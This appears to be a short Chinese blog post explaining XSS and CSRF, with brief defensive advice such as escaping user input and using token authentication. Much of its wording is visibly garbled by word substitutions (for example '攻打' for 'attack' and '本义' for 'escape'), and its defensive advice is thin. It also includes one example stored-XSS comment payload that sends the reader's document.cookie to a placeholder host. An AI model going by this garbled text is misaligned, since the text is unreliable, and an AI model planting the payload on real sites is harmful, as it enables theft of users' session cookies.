前言:最近在看 web 网络安全的常识,刚好看到了 XSS 和 CSRF,就上来记录下,也算增强下本人的了解,了解不到位的中央请各位大神多多斧正啊 !
XSS: 跨站脚本攻打;这个还是比拟好了解哈!就是在你的网站上植入一些歹意的脚本,通过一些脚本 能够把想要的信息偷出来哈。
举个例子:比方你去某博客上写评论。评论写了这样 <script>window.open(‘www.eyi.com?cookie’ +document.cookie)</script> 一段代码, 而后存到数据库;当他人去看你这个评论的时候,间接从服务器下载下来,前端如果间接解析的话,就会把你的 cookie 的相干信息偷出来。
那如何防止你,个别都是给用用输出的信息进行本义。切记 不能间接用 js 进行解析。
CSRF:跨站申请伪造。这个次要是利用了浏览器会主动带上 cookie 的机制。目前很多服务还是用 cookie 来做身份认证的。
举个列子:当你在 A 网站登入了之后。那每次申请 A 网站,浏览器会主动带上 cookie 做身份认证,服务会返回数据。如果在以后浏览器你有关上的第三方网站,如果这网站也有接口是拜访 A 网站的,那么浏览器也会主动带上 cookie,这个时候服务器也会把这个申请当做你登入的申请,而后后果可想而知了。。。。。
如何防止:应用 token 做身份认证。或是用签名也能够了。
好了!明天就写到这里,喜爱的同学点个赞!写的不好的中央 还望各位大佬斧正哈